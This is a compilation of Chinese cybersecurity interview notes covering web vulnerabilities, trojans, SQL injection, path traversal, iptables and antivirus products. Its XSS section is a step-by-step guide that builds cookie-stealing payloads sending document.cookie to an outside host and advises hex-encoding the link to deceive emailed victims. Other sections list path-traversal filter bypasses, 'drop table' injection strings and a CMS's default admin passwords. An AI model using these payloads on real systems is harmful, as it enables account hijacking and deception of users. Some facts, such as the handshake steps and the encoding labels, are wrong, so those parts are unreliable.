网络安全类面试题整理1

面试题笔记

 

如何查找网页漏洞?

网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。针对这么多的漏洞威胁，网站管理员要对自己的网站进行安全检测，然后进行安全设置或者代码改写。那如何来检测网站存在的漏洞呢?其实，很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。那么网站的 管理员就可以利用这些工具对网站进行安全检测，看有没有上述漏洞，笔者就不一一演示了。下面就列举一个当前比较流行的eWEBEditor在线HTML编 辑器上传漏洞做个演示和分析。

1、网站入侵分析
eWEBEditor是一个在线的HTML编辑器，很多网站都集成这个编辑器，以方便发布信息。低版本的eWEBEditor在线HTML编辑器，存在着上传漏洞，黑客利用这点得到WEBSHELL(网页管理权限)后，修改了网站，进行了挂马操作。

其原理是：eWEBEditor的默认管理员登录页面没有更改，而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后，添加一种新的样式类型，然后设置上传文件的类型，比如加入asp文件类型，就可以上传一个网页木马了。(图8)



2、判断分析网页漏洞

(1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似”ewebeditor.asp?id=”语句，只要类似的语句存在，就能判断网站确实使用了WEB编辑器。

(2)eWEBEditor编辑器可能被黑客利用的安全漏洞：
a.管理员未对数据库的路径和名称进行修改，导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。  直接下载默认路径的数据库
b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码，直接进入编辑器的后台。
     从数据库中获得账号密码登进后台
c.该WEB编辑器上传程序存在安全漏洞。   可直接上传木马

四、网页木马的防御和清除

1、防御网页木马，服务器设置非常重要，反注册、卸载危险组件：

(网页后门木马调用的组件)
(1)卸载wscript.shell对象，在cmd先或者直接运行：
regsvr32 /u %windir%system32WSHom.Ocx  

存在绕过，现在这里卸载了到时候攻击的时候再装上就可以了
(2)卸载FSO对象，在cmd下或者直接运行：
regsvr32.exe /u %windir%system32scrrun.dll
(3)卸载stream对象，在cmd下或者直接运行：
regsvr32.exe /u /s “C:Program FilesCommon FilesSystemadomsado15.dll”
注：如果想恢复的话只需重新注册即可，例如：regsvr32 %windir%system32WSHom.Ocx

2、清理网页挂马
(1)利用雷客图ASP站长安全助手查找所有在2008-3.1日-2008.3.5日之间所有修改过的文件里是否有iframe语句和http://www.xxx.com/a.htm关键词，进行手工清理。
(2)也可利用雷客图ASP站长安全助手批量删除网马。
(3)检测JS文件，在2008-3.1日-2008.3.5日之间增加的JS文件全部删除。(图9)

从分析报告可以看到网站的admin路径下发现lb.asp网页木马，经分析为老兵的网页木马。(加密后依旧能通过特征码分辨，推荐网站管理员使用雷客ASP站长安全助手，经常检测网站是否被非法修改。)

提示：雷客图ASP站长安全助手可以帮助站长分析网站的安全状况，但是一定要更改它的默认用户名和密码。

3、解决eWEBEditor编辑器安全隐患
由于网站在开发时集成了eWEBEditor编辑器，删除或者替换容易导致其他问题的出现，推荐按如下方案解决：
(1)修改该编辑器的默认数据库路径和数据库名，防止被黑客非法下载。
默认登录路径admin_login.asp
默认数据库db/ewebeditor.mdb
(2)修改编辑器后台登录路径和默认的登录用户名和密码，防止黑客进入管理界面。
默认帐号admin
默认密码admin或者admin888(图10)
(3)对Upload.asp语句进行修改，防止黑客利用其上传ASP木马从而获得WEB权限。
对上传语句现在进行修改：

将原来的：sAllowExt=Replace(UCase(sAllowExt),”ASP”,”")

修改为：sAllowExt=Replace(UCase(sAllowExt),”ASP”,”"),”CER”,”"),”ASA”,”"),”CDX”,”"),”HTR”,”")

增加上传对cer、asa、cdx、htr文件类型的限制，因为这些类型的文件都是可以执行的文件，可以被攻击者利用进行对网站及其服务器进行危险操作的文件类型。

 

 

 

 

centos iptables防火墙的基本命令解析
如果没有安装iptables需要先安装，CentOS执行：
yum install iptables Debian/Ubuntu

执行：
apt-get install iptables

 2、清除已有iptables规则

iptables -F
iptables -X
iptables -Z

3、开放指定的端口

#允许本地回环接口(即运行本机访问本机)
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
# 允许已建立的或相关连的通行
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
#允许所有本机向外的访问
iptables -A OUTPUT -j ACCEPT
# 允许访问22端口
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
#允许访问80端口
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
#允许FTP服务的21和20端口
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp --dport 20 -j ACCEPT
#如果有其他端口的话，规则也类似，稍微修改上述语句就行
#禁止其他未允许的规则访问
iptables -A INPUT -j REJECT
iptables -A FORWARD -j REJECT

4、屏蔽IP #如果只是想屏蔽IP的话“3、开放指定的端口”可以直接跳过。
#屏蔽单个IP的命令是
iptables -I INPUT -s 123.45.6.7 -j DROP
#封整个段即从123.0.0.1到123.255.255.254的命令
iptables -I INPUT -s 123.0.0.0/8 -j DROP
#封IP段即从123.45.0.1到123.45.255.254的命令
iptables -I INPUT -s 124.45.0.0/16 -j DROP
#封IP段即从123.45.6.1到123.45.6.254的命令是
iptables -I INPUT -s 123.45.6.0/24 -j DROP

 

4、查看已添加的iptables规则iptables -L -n
v：显示详细信息，包括每条规则的匹配包数量和匹配字节数
x：在 v 的基础上，禁止自动单位换算（K、M）vps侦探
n：只显示IP地址和端口号，不将ip解析为域名
5、删除已添加的iptables规则
将所有iptables以序号标记显示，执行：
iptables -L -n --line-numbers
比如要删除INPUT里序号为8的规则，执行：
iptables -D INPUT 8

 

6、iptables的开机启动及规则保存
CentOS上可能会存在安装好iptables后，iptables并不开机自启动，可以执行一下：
chkconfig --level 345 iptables on
将其加入开机启动。
CentOS上可以执行：service iptables save保存规则。
另外更需要注意的是Debian/Ubuntu上iptables是不会保存规则的。
需要按如下步骤进行，让网卡关闭是保存iptables规则，启动时加载iptables规则：
创建/etc/network/if-post-down.d/iptables 文件，添加如下内容：
#!/bin/bash
iptables-save > /etc/iptables.rules
执行：chmod +x /etc/network/if-post-down.d/iptables添加执行权限。
创建/etc/network/if-pre-up.d/iptables 文件，添加如下内容：
#!/bin/bash
iptables-restore < /etc/iptables.rules
执行：chmod +x /etc/network/if-pre-up.d/iptables添加执行权限。
关于更多的iptables的使用方法可以执行：iptables --help或网上搜索一下iptables参数的说明。

 

 

什么是网页挂马?网页挂马都有什么类型?

网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。
（挂网马的目的，让访问该网页的主机下载某木马的服务器端程序，进而控制浏览者的主机。
）
网页挂马的类型
1、框架嵌入式网络挂马
网页木马被攻击者利用iframe语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下：
解释：在打开插入该句代码的网页后，就也就打开了http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以很难察觉，非常具有隐蔽性。下面我们做过做个演示，比如在某网页中插入如下代码
在“百度”中嵌入了“IT168安全版块”的页面，效果如图1。(图1)
2、js调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术，如：黑客先制作一个.js文件，然后利用js代码调用到挂马的网页。通常代码如下：
http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关的选项就可以了，如图2就是一个JS木马的代码。(图2)
3、图片伪装挂马
随着防毒技术的发展，黑手段也不停地更新，图片木马技术逃避杀毒监视的新技术，攻击者将类似： http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中，这些嵌入代码的图片都可以用工具生成，攻击者只 需输入相关的选项就可以了，如图3。图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：
注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代码也随之运行。(图3)

4、网络钓鱼挂马(也称为伪装调用挂马)
网络中最常见的欺骗手段，黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页，利用社会工程学欺骗方法，引诱点击，当用户打开一个看似正常的页面时，网页代码随之运行，隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息，然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面，引诱输入QQ好和密码，如图4。(图4)
等用户输入完提交后，就把这些信息发送到攻击者指定的地方，如图5。(图5)

5、伪装挂马
高级欺骗，黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术，当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址，其实却打开了被挂马的页面，从而实现欺骗，示例代码如：
上面的代码的效果，在貌似http://safe.it168.com的链接如图6上点击却打开了http://www.hacker.com.cn，如图7。(图6)(图7)
总结：上述的挂马方式都是利用了系统的漏洞，并且挂马的代码不用攻击者编写，都是实现了工具化、傻瓜化。技术门槛比较低，因此危害也特别大。

 

 

恶意软件的定义

恶意软件-Malicious Software,malware
把未经授权便干扰或破坏计算机系统/网络功能的程序或代码（一组指令）称之为恶意程序。
一组指令：可能是二进制文件，也可能是脚本语言/宏语言等。

 

介绍一下如何利用路径遍历进行攻击及如何防范?

如果应用程序使用用户可控制的数据，以危险的方式访问位于应用服务器或其它后端文件系统的文件或目录，就会出现路径遍历
String rurl = request.getParameter(“rurl”);
BufferedWriter utput2 = new BufferedWriter(new FileWriter(new File(“/home/chenyz/”+rurl)));
攻击者可以将路径遍历序列放入文件名内，向上回溯，从而访问服务器上的任何文件，路径遍历序列叫“点-点-斜线”（..\）
http://***/go.action?file=..\..\etc\passwd

避开过滤
第一种是过滤文件名参数中是否存在任何路径遍历序列(..\)
如果程序尝试删除(..\)来净化用户输入，可以用
….// ….\/ …./\ ….\\
进行URL编码
点–>%2e 反斜杠–>%2f正斜杠–>%5c
进行16为Unicode编码
点–>%u002e 反斜杠–>%u2215正斜杠–>%u2216
进行双倍URL编码
点–>%252e 反斜杠–>%u252f正斜杠–>%u255c
进行超长UTF-8 Unicode编码
点–>%c0%2e %e0$40%ae %c0ae
反斜杠–>%c0af %e0%80af %c0%af
正斜杠–>%c0%5c %c0%80%5c
预防路径遍历的方法：
1.对用户提交的文件名进行相关解码与规范化
2.程序使用一个硬编码，被允许访问的文件类型列表
3.使用getCanonicalPath方法检查访问的文件是否位于应用程序指定的起始位置

 

 

介绍一下常见的木马种类?

目前常见的木马有三种：正向连接木马、反弹连接木马、收信木马。
正向连接木马，所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口。

由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有很大的不足。
动态IP：每次拨号，IP都会跟换.所以，就算对方中了木马，在下次拨号的时候，我们会因为找不到IP而丢肉鸡。

（开端口-连端口，不足：需要知道肉鸡ip而且该ip若变化则难以利用）

路由器：就是多个电脑同用1条宽带(网吧上网就是最好的例子)他们通过路由器连接到宽带，例如：主机的IP为225.124.3.41，而内网(就是用路由器的机器)的IP为192.168.X.X。在内网环境下，我们外界是无法访问的，就是机器中了木马也没用。下面大家看下我的示意图。简单来说，内网的机器是比较安全的，外界是无法访问的，就是我们连接不了内网器。而连接内网的机器，除非在同区域网里(在网吧A机，就能用RIDMIN连接网吧的B机).

简单总结：在不同区域网下，正向木马只能连接到外网的机器，而不能连接到内网的机器。
由于一系列的不足，就产生了反弹连接木马，例如出门的国产软件：灰鸽子

反弹连接木马，就是在我们机器上开启一个端口，让中马者来连接我们，从而获得肉鸡的信息，就算对方的IP怎么改变，也是无际于事。如果我们自己机器上的IP改变了，肉鸡就无法找到我们的机器，从而无法获得肉鸡的信息，不过这点是不成问题的，WWW兴起，就有了域名。在网络中通过的对域名的访问能找到自己对应的IP地址，例如www.baidu.com的IP地址为22.181.38.4如果百度的IP变成12.11.22.3的话，只要域名不改变，就算IP地址怎么变，它也能找到你。就算是内网的机器，我们也能获得他的信息。

总结到底：本地开启1个端口，肉鸡连接上我们，就算是内外网的机器也可以。

反弹连接木马最头疼的地方就是使用者是内网状态的(大家可以看我的路线图，蓝色为反弹连接，黑色为正常连接)。说到为什么最头疼，大家就回忆下正向连接木马的原理。别人是无法直接访问路由器内的机器(内网)。

 

关于某知名网络安全公司的面试笔试

虽然考题大部分是一些基础词题，但是明显可以看得出来，如果没有深厚的功底，是答不好的。我报网络安全工程师。
1.描述tcp的三次插手，写出syn ack的关系
我答：第一次握手：建立连接时，客户端发送syn包（syn=j）到服务器，并进入syn_send状态，等待服务器确认：
第二次握手：服务器接收到客户端发来的syn包。必须确认客户的syn（ack=j+1）,同时自己也发送一个syn包（syn=k），也就是syn+ack包，此时服务器进入syn_recv状态：
第三次握手：客户端就收到服务器的syn+ack包，向服务器发送ack包（ack=k+1），此时数据波发送完毕。客户端和服务器进入established状态，完成三次握手。
SYN是发送标志位,ACK是确认标志位  ps FIN是结束标志位

客户端 --syn---》 服务器端

客户端《--syn+ack--服务器端

客户端 --syn+ack---》 服务器端

2：描述tcp/udp的区别及优劣。描述p2p机制，及其发展前景
我答：区别：

TCP—传输控制协议,提供的是面向连接、可靠的字节流服务。当客户和服务器彼此交换数据前，必须先在双方之间建立一个TCP连接，之后才能传输数据。

TCP提供超时重发，丢弃重复数据，检验数据，流量控制等功能，保证数据能从一端传到另一端。（TCP建立连接 完整性强 速度慢）
UDP—用户数据报协议，是一个简单的面向数据报的运输层协议。UDP不提供可靠性，它只是把应用程序传给IP层的数据报发送出去，但是并不能保证它们能到达目的地。

由于UDP在传输数据报前不用在客户和服务器之间建立一个连接，且没有超时重发等机制，故而传输速度很快   （UDP不建立连接 不可靠 速度快）
优劣：当数据传输的性能必须让位于数据传输的完整性、可控制性和可靠性时，TCP协议是当然的选择。当强调传输性能而不是传输的完整性时，如：音频和多媒体应用，UDP是最好的选择。在数据传输时间很短，以至于此前的连接过程成为整个流量主体的情况下，UDP也是一个好的选择，如：DNS交换。

p2p机制描述：P2P是英文Peer-to-Peer（对等）的简称，又被称为“点对点”。“对等”技术，是一种网络新技术，依赖网络中参与者的计算能力和带宽，而不是把依赖都聚集在较少的几台服务器上。P2P还是英文Point to Point （点对点）的简称。它是下载术语，意思是在你自己下载的同时，自己的电脑还要继续做主机上传，这种下载方式，人越多速度越快但缺点是对硬盘损伤比较大（在写的同时还要读），还有对内存占用较多，影响整机速度。
发展前景：P2P技术擅长的地方就是最大限度地利用闲置的网络资源，这种应用在高能物理、核物理、气象、水文、太空研究等海量计算领域有巨大的应用前景。由于P2P技术是基于IPV6协议的，而IPV6的地址分配量是一个惊人的天文数字，在P2P技术支持下，在不远的将来，你可以用你的手机控制自家点灯的开关。产品推出后经常需要打补丁以解决发现的BUG或安全隐患，P2P技术使产品的分发变得十分简单，所有拥有这种产品的人会自动形成一个Workgroup，并且有严格的身份认证。产品厂商随时在这里提供升级补丁服务，而P2P技术会使你的电脑在不知不觉中完成打补丁和各种升级服务。对无线业务稍有了解的人都应该知道，我们的MMS还都是需要运营商Server的转发才能实现的。你有没有想过当你遇到一个令你激动的情景，只需要用手机的摄像头对准它，就可以将这个情景以Video的形式直接传送到你的朋友们那里，而这些看似只有在科幻电影中才有的镜头，在P2P技术中是完全可以方便地实现的。
3排序，用冒泡法或快速排序法，并分析时间/空间复杂度

 

 

 

IBatis如何防范SQL注入攻击?

风险：数据库资料被窃取，服务器被攻击者控制
漏洞1 示例：
在sqlmap中如下写法：
select * from table where name like ‘%$value$%’
UnSafeBean b = (UnSafeBean)sqlMap.queryForObject(“value”, request.getParameter(“name”));
漏洞1 说明：
其中sqlmap方式是把$*$替换，假设用户输入 ‘;drop table admin–
那么翻译为本地SQL为
select * from table where name like ‘%’;drop table admin–%’
修补方法：
采用 #*# 的方式 sqlmap是采用 预编译方式处理
把转义操作交给数据库本身！
select * from table where name like ‘%’||#value#||’%’

漏洞2 示例：
<select
id="queryByDynamicCondition"
resultMap="PrivateShowroomProductResult" >
$OrderId$ $sortSeq$
String orderId = group.getField(“orderId”).getStringValue();
query.setOrderId(StringUtils.isNotBlank(orderId)?orderId:null);
PaginationQueryList pageList =
orderService.listCustomerOrderForMistinessQuery(query);
漏洞2 说明：
其中sqlmap方式是把$*$替换，假设用户输入 a;drop table admin–
那么翻译为本地SQL为
select * from PRIVATE_SHOWROOM_PRODUCT order by a;drop table admin–
修补方法：
<select
id="queryByDynamicCondition"
resultMap="PrivateShowroomProductResult" >
$OrderId:METADATA$ $sortSeq:SQLKEYWORD$

 

 

如何保障Web服务器安全?

维护Web服务器安全是信息安全中最不讨好的差事之一。你需要在相冲突的角色中找到平衡，允许对网络资源的合法访问，同时阻止恶意破坏。

你甚至会考虑双重认证，例如RSA SecurID，来确保认证系统的高信任度，但是这对所有网站用户来说也许不实用，或者不划算。尽管存在这样相冲突的目标，仍有六个有助Web服务器安全的步骤。

1 、对内部和外部应用分别使用单独的服务器
假设组织有两类独立的网络应用，面向外部用户的服务和面向内部用户的服务，要谨慎地将这些应用部署在不同的服务器上。这样做可以减少恶意用户突破外部服务器来获得对敏感的内部信息地访问。如果你没有可用的部署工具，你至少应该考虑使用技术控制（例如处理隔离），使内部和外部应用不会互相牵涉。
2 、使用单独的开发服务器测试和调试应用软件
在单独的Web服务器上测试应用软件听起来像是常识——的确是。不幸的是，许多组织没有遵循这个基本规则，相反允许开发者在生产服务器上调试代码甚至开发新软件。这对安全和可靠性来说都很可怕。在生产服务器上测试代码会使用户遇到故障，当开发者提交未经测试易受攻击的代码时，引入安全漏洞。大多数现代版本控制系统（例如微软的Visual SourceSafe）有助于编码/测试/调试过程自动化。
3 、审查网站活动，安全存储日志
每一个安全专业人员都知道维护服务器活动日志的重要性。由于大多数Web服务器是公开的，对所有互联网服务进行审核是很重要的。审核有助你检测和打击攻击，并且使你可以检修服务器性能故障。在高级安全环境中，确保你的日志存储在物理安全的地点——最安全的（但是最不方便的）技巧是日志一产生就打印出来，建立不能被入侵者修改的纸记录，前提是入侵者没有物理访问权限。你也许想要使用电子备份，例如登录进安全主机，用数字签名进行加密，来阻止日志被窃取和修改。
4 、 培训开发者进行可靠的安全编码
软件开发者致力于创建满足商业需求的应用软件，却常常忽略了信息安全也是重要的商业需求。作为安全专业人员，你有责任对开发者进行影响到Web服务器的安全问题的培训。你应该让开发者了解网络中的安全机制，确保他们开发的软件不会违背这些机制；还要进行概念的培训，例如内存泄漏攻击和处理隔离——这些对编码和生成安全的应用软件大有帮助。
5 、给操作系统和Web服务器打补丁
这是另一个常识，但是当管理员因为其他任务而不堪重荷时常常忽略这一点。安全公告，像是CERT或者微软发布的公告，提醒人们软件厂商多频繁地发布某些安全漏洞的修补程序。一些工具像是微软的软件升级服务（SUS）和RedHat的升级服务有助于使这项任务自动化。总之，一旦漏洞公布，如果你不修补它，迟早会被人发现并利用。
6 、使用应用软件扫描
如果负担地起，你也许会考虑使用应用软件扫描器来验证内部编码。像是 Watchfire公司的AppScan这样的工具有助于确保编码在生产环境里不会存在漏洞。记住，要有安全意识。设计良好的Web服务器结构应该基于健全的安全政策。贯彻执行这六个方法会帮助你建立坚固的基础。

 

 

网络安全类面试题

怎么样提高局域网安全

2、公司网络安全具体指什么?(NTT公司)(一是网络方面,另一个是公司的制度) 
3、如果用户电脑中毒了，但用户不想重新安装系统，通过什么方法最有效的解决问题? 
4、你接触过哪些杀毒软件，杀毒软件客户端可以通过那些方法安装? 
5、mcafee是什么软件?你熟悉吗? 
6、安全是什么 
7、针对135端口的攻击的检测? 
8、无端口木马与反射端口木马有什么不同?

 

 

 

如何判断计算机可能已经中马?

计算机系统运行速度减慢。
计算机系统经常无故发生死机。
计算机系统中的文件长度发生变化。
计算机存储的容量异常减少。
系统引导速度减慢。
丢失文件或文件损坏。
计算机屏幕上出现异常显示。
计算机系统的蜂鸣器出现异常声响。
磁盘卷标发生变化。
系统不识别硬盘。
对存储系统异常访问。
键盘输入异常。
文件的日期、时间、属性等发生变化
文件无法正确读取、复制或打开。
命令执行出现错误。
虚假报警。
换当前盘。有些病毒会将当前盘切换到C盘。
时钟倒转。有些病毒会命名系统时间倒转，逆向计时。
Windows操作系统无故频繁出现错误。
系统异常重新启动。
一些外部设备工作异常。
异常要求用户输入密码。
Word或Excel提示执行“宏”。
是不应驻留内存的程序驻留内存。

 

 

 

 

什么叫做SQL注入，如何防止?请举例说明。

利用sql关键字对网站进行攻击。过滤关键字’等
所谓SQL注入（SQL Injection），就是利用程序员对用户输入数据的合法性检测不严或不检测的特点，故意从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取想得到的资料。
http://localhost/lawjia/show.asp?ID=444 and user>0，这时，服务器运行Select * from表名 where字段=444 and user>0这样的查询，当然，这个语句是运行不下去的，肯定出错，错误信息如下：
·错误类型：
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ‘sonybb’ 转换为数据类型为int 的列时发生语法错误。

 

能否解释一下XSS cookie盗窃是什么意思?

根据作为攻击对象的Web程序，下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中，我们将利用脚本“a.php”中的“viriable”变量中的跨站脚本漏洞，通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。
第一步: 锁定目标
当你找到某个Web程序存在XSS漏洞之后，检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie，那么就可以从用户那里盗取它。
第二步: 测试
不同的攻击方式将产生不同的XSS漏洞，所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。（为欺骗用户，输出结果非常重要，因此攻击者有必要调整攻击代码使输出看起来正常。）

下一步你需要在链接至包含XSS漏洞的页面的URL中插入Javascript（或其他客户端脚本）。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时，用户的cookie奖被发送到www.cgisecurity.com/cgi-bin/cookie.cgi 并被显示。如果你看到显示结果中包含了cookie信息，说明可能可以劫持该用户的账户。
盗取Cookie的Javascript示例。使用方法如下。

ASCII用法
http://host/a.php?variable=”>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie
十六进制用法
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注意: 每种用法都先写为ASCII，再写成十六进制以便复制粘贴。

1. “>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie

HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

2. document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie

HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

3. >document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie

HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

第三步: 执行XSS
将做好的URL通过电子邮件或其他方式发送出去。注意如果你直接将URL发送给其他人（通过电子邮件、即时通讯软件或其他方式），你应当将其进行十六进制编码，因为这些URL一眼便可看出包含恶意代码，但经过十六进制编码之后就可以欺骗大部分人。
第四步: 处理收集到的信息
一旦用户点击了你的URL，相应数据就会被发送到你的CGI脚本中。这样你就获得了cookie信息，然后你可以利用Websleuth之类的工具来检查是否能盗取那个账户。

在上面的例子中，我们仅仅将用户带到了 cookie.cgi页面上。如果你有时间，你可以在CGI中将用户重定向到原来的页面上，即可在用户不知不觉之中盗取信息。

某些电子邮件程序在打开附件时会自动执行附件中的Javascript代码。即使像Hotmail这样的大型网站也是如此，不过它对附件内容作了许多过滤以避免cookie被盗。

 

 

 

木马的传播途径主要有哪些?

木马主要是依靠邮件、下载等途径进行传播
木马也可以通过各种脚本进行传播。比如，IE浏览器在执行脚本时存在一些漏洞，入侵者可以利用这些漏洞进行木马的传播与种植。当目标主机执行了木马的服务端程序之后，入侵者便可以通过客户端程序与目标主机上的服务端建立连接，进而控制目标主机。对于通信协议的选择，绝大多数木马使用的是TCP/IP协议，但也有使用UDP协议的木马。所以，做好木马的检测工作可以及时的发现以及处理木马，降低木马所带来的损失。

 

 

 

SQL注入攻击的种类有哪些?

没有正确过滤转义字符
SELECT * FROM users WHERE name = ‘” + userName + “‘;
SELECT * FROM users WHERE name = ‘a’ OR ‘t’='t’;
2.错误的类型处理
SELECT * FROM data WHERE id = ” + a_variable + “;
SELECT * FROM DATA WHERE id = 1; DROP TABLE users;
3.数据库服务器中的漏洞
MYSQL服务器中mysql_real_escape_string()函数漏洞，允许一个攻击者根据错误的统一字符编码执行成功的SQL注入式攻击
4.盲目SQL注入式攻击
Absinthe的工具就可以使这种攻击自动化
5.条件响应
6.条件性差错
7.时间延误

 

 

请介绍一下常见的网络安全防护软件的性能

金山毒霸2005
 1、特别推荐
主动实时升级：
无需用户做任何操作，当有最新的病毒库或者功能出现时，金山毒霸可将此更新自动下载安装。此功能保证您在任何时刻都可以获得与全球同步的最新病毒特征库，防止被新病毒破坏感染，即使面对“冲击波”这样快速传播的病毒，金山毒霸2005也能极大程度的遏制病毒入侵用户计算机！

抢先启动防毒系统：
防毒胜于杀毒，抢先启动的防毒系统可保障在Windows未完全启动时就开始保护用户的计算机系统，早于一切开机自运行的病毒程序，使用户避免“带毒杀毒”的危险。抢先式防毒让您的安全更早一步。

2、经典奉献
主动漏洞修复：
可扫描操作系统及各种应用软件的漏洞，当新的安全漏洞出现时，金山毒霸会下载漏洞信息和补丁，经扫描程序检查后自动帮助用户修补。此功能可确保用户的操作系统随时保持最安全状态，避免利用该漏洞的病毒侵入系统。另外还会扫描系统中存在的诸如简单密码、完全共享文件夹等安全隐患。

跟踪式反间谍：
采用全新的网络程序校验策略。除了传统反黑、拦截木马等功能外，同时对普通应用程序进行跟踪监控。一旦应用程序的大小、内容等属性发生异常变化，系统将特别提醒用户注意，有效防止止木马、间谍软件“冒名顶替”盗取用户数据。

木马防火墙：
通过多种技术，实现对木马进程的查杀。系统中一旦有木马、黑客或间谍程序访问网络，会及时拦截该程序对外的通信访问，然后对内存中的进程进行自动查杀，保护用户网络通信的安全。这对防御盗取用户信息的木马、黑客程序特别有效。
星杀毒软件网络版是一款应用于复杂网络结构的企业级反病毒产品，该产品专门为企业用户量身定做，使企业轻松构建安全的立体防毒体系。该产品主要适用于企业服务器与客户端，支持 WindowsNT/2000/XP、Unix、Linux等多种操作平台，全面满足企业整体反病毒需要。

瑞星杀毒软件网络版创立并实现了“分布处理、集中控制”技术，以系统中心、服务器、客户端、控制台为核心结构，成功地实现了远程自动安装、远程集中控管、远程病毒报警、远程卸载、远程配置、智能升级、全网查杀、日志管理、病毒溯源等功能，它将网络中的所有计算机有机地联系在一起，构筑成协调一致的立体防毒体系。

瑞星杀毒软件网络版采用目前国际上最先进的结构化多层可扩展（SME）技术设计研制的第五代引擎，实现了从预杀式无毒安装、漏洞扫描、特征码判断查杀已知病毒，到利用瑞星专利技术行为判断查杀未知病毒，并通过可疑文件上报系统、嵌入式即时安全信息中心与瑞星中央病毒判别中心构成的信息交互平台，改被动查杀为主动防御，为网络中的个体计算机提供点到点的立体防护
江民杀毒KV2005 9.00.504(2005.1.13)

软件语言：简体中文
授权方式：零售版
软件类别：病毒防治
运行环境：Win9x/WinNT/2000/ME/XP
采用先进的“驱动级编程技术”，能够与操作系统底层技术更紧密结合，具有更好的兼容性，占用系统资源更小。KV2005突出特点是独创的“系统级深度防护技术”与操作系统互动防毒，彻底改变以往杀毒软件独立于操作系统和防火墙的单一应用模式，开创杀毒软件系统级病毒防护新纪元。据悉，江民对微软的XP SP2安全中心进行了延伸和拓展，在此基础上开发了KV安全中心，不但可以在XP操作系统上应用，WIN98、WIN2000用户同样可以拥有安全中心。同时，KV2005采用了先进的“立体联动防杀技术”，即杀毒软件与防火墙联动防毒、同步升级，对于防范集蠕虫、木马、后门程序等特性于一体的混合型病毒更有效
